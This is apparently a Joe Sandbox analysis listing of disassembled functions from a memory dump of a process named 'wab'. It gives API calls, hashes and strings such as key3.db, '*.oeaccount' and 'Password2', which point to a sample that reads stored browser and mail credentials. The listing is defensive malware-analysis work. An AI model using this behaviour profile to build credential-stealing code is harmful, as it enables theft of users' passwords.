                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                      • Opcode ID: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                                                                                      • Instruction ID: d5d25afb3259b03ed1d628add5c616d0d22dc24c96253af88726d5856d44a725
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01653680052ABBDB11ABA59C49EFFBFBCFF06750F04402AFD05A2181D77895018BA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B6EF Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                                                                                                                                                                                                        • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                                                                                                                                                                                                        • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                                                                                                                                                                                                        • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                                        • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                                        • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                                        • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                                      • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2374668499-0
                                                                                                                                                                                                                      • Opcode ID: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                                      • Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040AA94 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AAB7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AACD
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                        • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                        • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                        • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AB04
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                                                                                                                                                                                                      • <%s>, xrefs: 0040AAFE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                      • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                      • API String ID: 3699762281-1998499579
                                                                                                                                                                                                                      • Opcode ID: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                                      • Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040979F Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                                      • Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409805 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                                                                                        • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                                      • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004100EC Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                                                                                        • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                                                                                        • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00410125
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2775283111-0
                                                                                                                                                                                                                      • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                                      • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406868 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004068B2
                                                                                                                                                                                                                        • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                        • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                        • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: C@$key3.db
                                                                                                                                                                                                                      • API String ID: 1968906679-1993167907
                                                                                                                                                                                                                      • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                                      • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                        • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                      • API String ID: 3492281209-168460110
                                                                                                                                                                                                                      • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                                      • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406EA5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                      • API String ID: 275601554-2167791130
                                                                                                                                                                                                                      • Opcode ID: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                                                      • Instruction ID: 847e1e856ca93c5331a43762777f09d1dcd0b535ae5450603ebfd434222f9f24
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E09B73C5412E7AEB21B6A4DC01FE6776CEF55705F0000F7B945E10C1E5B45A888B95
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040732D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_mbscat
                                                                                                                                                                                                                      • String ID: 8D
                                                                                                                                                                                                                      • API String ID: 3951308622-2703402624
                                                                                                                                                                                                                      • Opcode ID: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                                                      • Instruction ID: fdb3abcae466a204d6f595596d606a7769775cd3d87c53e6d0f7ff6b17e0c5bf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ec1879d80d4c340dda7a3243aeb4a8038102bdf29c15a79d9befc878d316230
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7D0A73390D62027F6153617BC07D8E5BD1CFD0779B18041FF908D2181DD3E8495909D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00443131 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpy
                                                                                                                                                                                                                      • String ID: Password2
                                                                                                                                                                                                                      • API String ID: 2600922555-1856559283
                                                                                                                                                                                                                      • Opcode ID: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                                                                                      • Instruction ID: 284e3ed20e01ed0f985c27cc48ee8d5f57cf04e2e68a318951e5723102309710
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd6d1596d5adc5cb59be199e9a5e42366e44826479dad9da6a8aaa41d84d8c14
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041067E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                      • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                                      • API String ID: 2574300362-543337301
                                                                                                                                                                                                                      • Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                                                      • Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00431CB5 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 469COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: rows deleted
                                                                                                                                                                                                                      • API String ID: 2221118986-571615504
                                                                                                                                                                                                                      • Opcode ID: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                                      • Instruction ID: 2c87624536f7d1d2c67b3f30ed48d8bcf82a012ac595ca9270874480dc5e5985
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47028F71E00218AFDF14DF99DD81AAEBBB5EF08314F14005AFA04A7352E775AD41CB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041B58C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                      • Opcode ID: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                                      • Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00442878 Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      • Opcode ID: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                                      • Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404883 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                      • Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                                      • Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041546A Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 211COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: +MA$psow$winOpen
                                                                                                                                                                                                                      • API String ID: 2221118986-3077801942
                                                                                                                                                                                                                      • Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                                      • Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0042BB86 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042BC19
                                                                                                                                                                                                                      • too many SQL variables, xrefs: 0042BD54
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
